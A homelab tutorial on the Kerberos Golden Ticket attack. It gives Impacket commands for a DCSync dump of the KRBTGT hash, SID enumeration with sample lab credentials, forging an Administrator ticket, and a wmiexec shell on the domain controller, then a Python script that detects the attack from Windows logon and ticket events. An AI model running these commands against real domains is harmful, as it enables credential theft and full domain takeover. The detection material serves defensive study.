Golden Ticket

Introduction

A golden ticket is a forged Kerberos Ticket Granting Ticket (TGT). With this ticket, an attacker can impersonate any user, including domain admins, and access any service in the domain.

A Golden Ticket is encrypted and signed using the KRBTGT account's password hash. Since this hash is used by the KDC service to sign all Kerberos tickets, any forged ticket signed with the KRBTGT password hash will be trusted by the KDC as if it were legitimate.

Attack Path

To perform this attack, we need two pieces of information: the domain's SID and the KRBTGT account's password hash.

The KRBTGT password hash can be obtained using a DCSync attack. The command below performs the DCSync attack:

impacket-secretsdump <domain_name>/<username:password>@<target_domain_controller>
DCSync attack

Enumerate the domain's SID:

impacket-lookupsid jstone:dragon@192.168.126.145 -domain-sids
lookupsid.py

Now we can forge a TGT. I will use ticketer.py from Impacket, as shown in the command below (the forged ticket is issued for the Administrator account of the homelab.local domain):

impacket-ticketer -nthash <krbtgt_password_hash> -domain-sid <SID> -domain homelab.local Administrator
Create Golden Ticket with Administrator account

The ticket is saved as Administrator.ccache. We will use wmiexec.py with this ticket to gain access to DC1 as Administrator. Since wmiexec.py reads credentials from the ccache file named by the KRB5CCNAME environment variable, we need to set KRB5CCNAME to Administrator.ccache.

wmiexec -help

The command below sets KRB5CCNAME to Administrator.ccache:

export KRB5CCNAME=Administrator.ccache

After this, we can use klist to check the Kerberos ticket that we have:

After confirming that the ticket is available through KRB5CCNAME, we run the command below to gain access to DC1 (-k tells wmiexec to use Kerberos authentication from the ccache, and -no-pass tells it not to prompt for a password):

impacket-wmiexec homelab.local/Administrator@DC1.homelab.local -k -no-pass

Detection

To detect this attack, we can look for suspicious logon events. For example, an unusual IP address logging into the Administrator account on the Domain Controller, assuming we know that, under normal circumstances, this IP is not expected to log into the Administrator account.

Event capturing the attack machine logging in to the Administrator account

Moreover, we can look for events where a service ticket (TGS) request is made by a user who has not obtained a Ticket Granting Ticket (TGT) beforehand. A golden ticket is forged offline, so the Domain Controller never issued the TGT that the attacker presents; the first thing the DC sees is a TGS request backed by a TGT it has no record of issuing.
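The two detection ideas above can be checked with a small correlation script. The example below is added here and is not part of the original write-up or of Impacket; it runs over constructed sample events (not real logs) that mirror the Windows Security event IDs 4768 (TGT requested), 4769 (service ticket requested) and 4624 (successful logon). The allow-list of expected Administrator source addresses and the ten-hour lookback (the default maximum TGT lifetime in Active Directory) are assumptions for the example.

```python
"""Flag two Golden Ticket indicators in a stream of Windows Security events:
  1. a service ticket request (4769) for an account/source that never obtained
     a TGT (4768) from this DC within the TGT lifetime, and
  2. a successful logon (4624) to Administrator on the DC from a source IP
     that is not on the expected list.
Added example, not from the original page. Events below are constructed."""
from datetime import datetime, timedelta

# Constructed sample events. A real pipeline would parse these from the
# Security log (EventID, TargetUserName, IpAddress, ServiceName, ...).
SAMPLE_EVENTS = [
    {"time": "2024-05-01T09:00:00", "id": 4768, "account": "jstone", "ip": "192.168.126.50"},
    {"time": "2024-05-01T09:00:05", "id": 4769, "account": "jstone", "ip": "192.168.126.50", "service": "cifs/DC1"},
    {"time": "2024-05-01T09:00:06", "id": 4624, "account": "jstone", "ip": "192.168.126.50", "host": "DC1"},
    # Forged TGT presented directly: no 4768 was ever logged for this account/source.
    {"time": "2024-05-01T09:15:00", "id": 4769, "account": "Administrator", "ip": "192.168.126.200", "service": "host/DC1"},
    {"time": "2024-05-01T09:15:02", "id": 4624, "account": "Administrator", "ip": "192.168.126.200", "host": "DC1"},
]

# Assumed policy (hypothetical): only this address normally uses Administrator on DC1.
EXPECTED_ADMIN_SOURCES = {"192.168.126.10"}
# Assumed lookback: the default maximum TGT lifetime in Active Directory.
TGT_LOOKBACK = timedelta(hours=10)


def _ts(event):
    return datetime.fromisoformat(event["time"])


def tgs_without_tgt(events, lookback=TGT_LOOKBACK):
    """Return 4769 events whose (account, source ip) had no 4768 within lookback."""
    last_tgt = {}  # (account, ip) -> time of the most recent 4768
    alerts = []
    for event in sorted(events, key=_ts):
        key = (event["account"].lower(), event["ip"])
        if event["id"] == 4768:
            last_tgt[key] = _ts(event)
        elif event["id"] == 4769:
            issued = last_tgt.get(key)
            if issued is None or _ts(event) - issued > lookback:
                alerts.append(event)
    return alerts


def unexpected_admin_logons(events, expected=EXPECTED_ADMIN_SOURCES,
                            account="administrator", host="DC1"):
    """Return 4624 events for the named account on the DC from a non-allow-listed IP."""
    return [
        event for event in events
        if event["id"] == 4624
        and event["account"].lower() == account
        and event.get("host") == host
        and event["ip"] not in expected
    ]


def golden_ticket_alerts(events):
    """Combine both checks into human-readable alert strings."""
    alerts = []
    for event in tgs_without_tgt(events):
        alerts.append(f"{event['time']} TGS for {event['account']} from {event['ip']} "
                      f"({event.get('service')}) with no preceding TGT from this DC")
    for event in unexpected_admin_logons(events):
        alerts.append(f"{event['time']} logon to {event['account']} on {event['host']} "
                      f"from unexpected source {event['ip']}")
    return alerts


if __name__ == "__main__":
    for line in golden_ticket_alerts(SAMPLE_EVENTS):
        print(line)
```

The TGT check is keyed on (account, source IP) and only sees tickets issued by the DC whose log is being read; in a multi-DC domain the 4768 may have been logged on a different DC, so the logs of all DCs should be merged before running it, and a user who obtains a TGT from one address and uses it from another will also show up and needs to be tuned out. The second check depends entirely on the accuracy of the expected-source list.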
